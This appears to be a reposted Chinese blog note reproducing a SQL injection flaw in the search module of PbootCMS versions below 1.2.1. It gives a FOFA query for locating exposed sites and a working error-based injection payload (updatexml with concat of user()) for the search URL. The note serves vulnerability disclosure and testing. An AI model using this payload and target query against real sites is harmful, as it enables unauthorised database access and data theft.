0
0

PbootCMS search SQL注入漏洞

漏洞描述

i ⭐

PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息

漏洞影响

s ✅

PbootCMS < 1.2.1

空间测绘

d ⭕

FOFA:app="PBOOTCMS"

漏洞复现

  • 搜索框页面为在这里插入图片描述
  • ✅ Payload为
/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)

在这里插入图片描述

我的个人博客

https://gylq.gitee.io/time/

标签: php 安全 开发语言
本文转载自: https://blog.csdn.net/qq_35938621/article/details/125765663
版权归原作者 孤桜懶契 所有, 如有侵权,请联系我们删除。
登录后发布评论

“PbootCMS search SQL注入漏洞”的评论:

还没有评论
关于作者
...
overfit同步小助手
文章同步
相关阅读

第133天:内网安全-横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝

ZIP伪加密

Selenium 定位编辑框有span

docker 在拉取镜像超时ERROR: Get “https://registry-1.docker.io/v2/

royal tsx —— 一款Mac平台MobaXterm平替工具

RVC-WebUI: 轻松实现高质量AI语音转换的开源工具

GitHub Actions的 CI/CD

文章导航